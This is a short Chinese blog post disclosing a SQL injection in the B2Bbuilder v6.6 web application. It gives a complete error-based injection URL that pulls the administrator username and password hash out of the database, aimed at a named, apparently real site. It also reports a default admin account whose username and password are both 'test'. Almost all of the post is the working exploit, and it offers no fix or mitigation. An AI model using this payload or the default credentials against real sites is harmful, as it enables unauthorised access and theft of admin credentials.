博主测试的程序版本为:B2Bbuilder_v6.6
注入点点:http://www.hedysx.com/?m=offer&s=offer_list&id=1004
Exp:

http://www.hedysx.com/?m=offer&s=offer_list&id=1004+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x27%2C0x7e%2Cb2bbuilder_admin.user,0x27,password%2C0x27%2C0x7e%29+from+%60b2bbuilder%60.b2bbuilder_admin+Order+by+user+limit+0%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1

QQ20130717160142

这个B2B程序还有一个默认的管理员帐号,帐号密码都是test

QQ20130717160410

注:

注入漏洞发现者为:saviour

本博客测试+提供Exp